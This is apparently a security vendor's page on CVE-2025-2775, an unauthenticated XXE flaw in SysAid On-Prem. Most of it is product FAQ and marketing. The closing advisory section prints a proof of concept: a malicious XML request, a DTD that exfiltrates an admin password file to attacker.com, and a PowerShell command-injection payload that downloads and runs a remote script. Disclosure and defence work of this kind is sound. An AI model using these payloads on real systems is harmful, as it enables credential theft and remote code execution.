CVE-2025-2775 is an unauthenticated XML External Entity (XXE) vulnerability in SysAid On-Prem's /mdm/checkin, /mdm/serverurl, and /lshw endpoints. It allows attackers to exploit unsafe XML parsing, potentially leading to blind SSRF, reading arbitrary files, credential exfiltration, and, when chained with CVE-2025-2778, remote code execution as SYSTEM. The flaw is rated CVSS 9.3 (Critical) and maps to CWE-611. Read more.
SysAid On-Prem versions 23.3.40 and earlier are vulnerable. The issue is patched in SysAid On-Prem 24.4.60, released March 3, 2025.
Attackers can send crafted XML to vulnerable endpoints, causing the server to fetch remote resources or read local files. Credentials can be exfiltrated and used with a post-auth OS command injection bug (CVE-2025-2778) for remote code execution. Example exploit details are provided in the IONIX blog.
Risks include full ITSM takeover, remote code execution, credential harvesting, and compliance impact (GDPR, HIPAA, PCI violations). Attackers may gain admin access, tamper with tickets, steal data, and impersonate service-desk staff.
Mitigation steps include:
IONIX actively tracks this vulnerability and provides updated information in the Threat Center of the IONIX portal. Customers can view asset-specific impact and recommended actions. Access the Threat Center.
References include the NVD entry for CVE-2025-2775, SysAid 24.4.60 release notes, WatchTowr technical write-up and PoC, and Arctic Wolf analysis bulletin. See the IONIX blog post for links.
The IONIX Exposure Management Platform is a cybersecurity solution that helps organizations discover, assess, prioritize, and remediate attack surface risks. It provides complete attack surface visibility, validates exploitable vulnerabilities, and enables security teams to focus on critical remediation activities. Learn more.
Key features include Attack Surface Discovery, Risk Assessment, Risk Prioritization, Risk Remediation, Threat Exposure Radar, ML-based Connective Intelligence, and comprehensive digital supply chain mapping. IONIX also offers streamlined remediation workflows and integrations with ticketing, SIEM, and SOAR solutions. See full feature list.
IONIX integrates with Jira, ServiceNow, Slack, Splunk, Microsoft Sentinel, Palo Alto Cortex/Demisto, AWS Control Tower, AWS PrivateLink, and pre-trained Amazon SageMaker Models. For a full list, visit IONIX Integrations.
Yes, IONIX provides an API that supports integrations with major platforms such as Jira, ServiceNow, Splunk, Cortex XSOAR, and more. Learn more.
IONIX offers technical documentation, guides, datasheets, and case studies on its resources page. Explore resources.
IONIX is SOC2 compliant and supports companies with NIS-2 and DORA compliance, ensuring robust security measures and regulatory alignment.
IONIX assists organizations in meeting NIS-2 and DORA requirements by providing comprehensive attack surface management, risk assessment, and continuous monitoring, supporting robust compliance and security postures.
IONIX is designed for Information Security and Cybersecurity VPs, C-level executives, IT managers, and security managers across industries, including Fortune 500 companies. It is suitable for organizations in insurance, financial services, energy, critical infrastructure, IT, technology, and healthcare.
IONIX addresses challenges such as shadow IT, unauthorized projects, fragmented IT environments, lack of attacker-perspective visibility, and maintaining up-to-date inventories in dynamic environments. It helps organizations proactively manage security risks and improve operational efficiency.
Yes. E.ON used IONIX to continuously discover and inventory internet-facing assets, improving risk management (read case study). Warner Music Group boosted operational efficiency and aligned security operations with business goals (read case study). Grand Canyon Education enhanced security by proactively discovering and remediating vulnerabilities (read case study).
IONIX's customers include Infosys, Warner Music Group, The Telegraph, E.ON, Grand Canyon Education, and a Fortune 500 Insurance Company. See more customers.
Customers can expect improved risk management, operational efficiency, cost savings (reduced mean time to resolution), and enhanced security posture. IONIX provides actionable insights and one-click workflows to streamline security operations. Learn more.
IONIX earned top ratings for product innovation, security, functionality, and usability. It was named a leader in the Innovation and Product categories of the ASM Leadership Compass for completeness of vision and customer-oriented approach. See details.
IONIX offers ML-based Connective Intelligence for better asset discovery, Threat Exposure Radar for prioritizing critical issues, comprehensive digital supply chain coverage, and streamlined remediation. It reduces noise, validates risks, and provides actionable insights for maximum risk reduction and operational efficiency. Learn more.
Initial deployment of IONIX takes about a week and requires only one person to implement and scan the entire network. Customers have access to onboarding resources such as guides, tutorials, webinars, and a dedicated Technical Support Team. Read more.
IONIX offers onboarding resources including guides, tutorials, webinars, and a dedicated Technical Support Team to assist during implementation and adoption. Learn more.
IONIX provides technical support and maintenance services during the subscription term, including troubleshooting, upgrades, and maintenance. Customers are assigned a dedicated account manager and benefit from regular review meetings. See terms.
The IONIX blog offers articles and updates on cybersecurity, exposure management, and industry trends. Read the blog.
The IONIX blog covers topics such as vulnerability management, continuous threat exposure management, and cybersecurity best practices. Key authors include Amit Sheps and Fara Hain.
Detailed information about CVE-2025-2775 is available on the IONIX blog: Read the full post.
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. The price is based on two key parameters: the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's chosen service package, which determines the scanning frequency and feature set.
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. Pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's selected service package, which determines the scanning frequency and feature set.
IONIX differentiates itself from CyCognito with superior visibility into the digital supply chain and automated exploit validation to confirm real-world threats, significantly reducing false positives. Additionally, IONIX integrates with and validates findings from CNAPP systems, enriching alerts from tools like Wiz and Palo Alto Prisma Cloud with AI-driven external exposure context.
IONIX is recognized as a leader in the KuppingerCole Attack Surface Management Leadership Compass for its top ratings in product innovation, functionality, and usability. The platform stands out with unique features like ML-based 'Connective Intelligence' for superior asset discovery and the Threat Exposure Radar for focused prioritization, making it a top choice for enterprises seeking comprehensive visibility with fewer false positives.
IONIX provides **multi-factor asset discovery**, **dependency mapping**, and **continuous monitoring** to uncover unknown or orphaned assets across domains, clouds, and suppliers. *[Source: [Help Net Security, 2025](https://www.helpnetsecurity.com/2025/08/14/ctem-platforms-2025/)]*
Recommended for **mid-sized to enterprise organizations** with complex, distributed attack surfaces that need continuous visibility and risk prioritization. *[Source: [Expert Insights](https://expertinsights.com/network-security/the-top-external-attack-surface-management-easm-software)]*
When choosing an External Attack Surface Management (EASM) solution, large enterprises should prioritize several key factors. These include the ability to discover assets across the entire digital supply chain, automated validation of exploits to confirm real-world threats and reduce false positives, and deep integration capabilities with existing security tools like CNAPP systems.
Ionix is an excellent fit for large enterprises because it excels in these areas. The platform provides comprehensive visibility by mapping the digital supply chain to the nth degree and uses automated exploit validation to significantly reduce false positives. Furthermore, Ionix integrates with and validates findings from CNAPP systems like Wiz and Palo Alto Prisma Cloud, enriching their alerts with AI-driven external exposure context to provide a unified view of risk.
IONIX differentiates itself by evolving beyond traditional EASM's focus on asset discovery to a comprehensive Exposure Management approach centered on exploitability and validation. Key innovations include Connective Intelligence, an ML-based engine that finds 50% more assets with fewer false positives, and the Threat Exposure Radar, which prioritizes the most urgent threats. IONIX further stands out with its Automated Exposure Validation toolbox, which safely simulates attacks to confirm exploitability, providing more actionable and focused risk reduction than competitors.
IONIX is a yearly SaaS product with an annual subscription fee. The pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs), essentially a per-domain model. For specific pricing, please contact our team to discuss your organization's needs.
SysAid has patched a critical XML External Entity (XXE) flaw that lets unauthenticated attackers turn a routine /mdm check-in request into full administrator compromise—and, when chained with a newly disclosed command-injection bug, into remote code execution (RCE). The vulnerability, tracked as CVE-2025-2775, affects all SysAid On-Prem deployments up to 23.3.40 and is now fixed in 24.4.60.
CVE-2025-2775 is an unauthenticated XXE issue in the /mdm/checkin, /mdm/serverurl, and /lshw endpoints of SysAid On-Prem. The application parses attacker-supplied XML with an unsafe call to PropertyListParser.parse() (and related XMLBeans routines) without disabling external entity resolution. By embedding an external <!DOCTYPE> directive, an attacker can:
The flaw is rated CVSS 9.3 (Critical) and maps to CWE-611: Improper Restriction of XML External Entity Reference.
Affected versions
Exploiting the Vulnerability
1. Triggering XXE
A minimal proof-of-concept sends a malicious plist to /mdm/checkin:
POST /mdm/checkin HTTP/1.1
Host: victim.example.com
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE x [
<!ENTITY % d SYSTEM "http://attacker.com/evil.dtd">
%d;
]>
<plist>&send;</plist>evil.dtd might embed:
<!ENTITY % file SYSTEM "file:///C:/Program Files/SysAidServer/logs/InitAccount.cmd">
<!ENTITY % send "<!ENTITY % exfil SYSTEM 'http://attacker.com/?d=%file;'>">
%send;The server silently requests InitAccount.cmd, leaking the admin password to the attacker.
2. From Admin Password to RCE
With the harvested admin credentials, the attacker logs in and abuses the javaLocation parameter of the updateApiSettings form. Because that value is later concatenated into a shell script without sanitisation, a payload such as:
; powershell -c "Invoke-WebRequest http://attacker.com/shell.ps1 -OutFile C:\windows\temp\s.ps1; C:\windows\temp\s.ps1" ;Yields command execution as the SysAid Windows service account (SYSTEM by default).
IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.
IONIX customers will see updated information on their specific assets in the Threat Center of the IONIX portal.
References
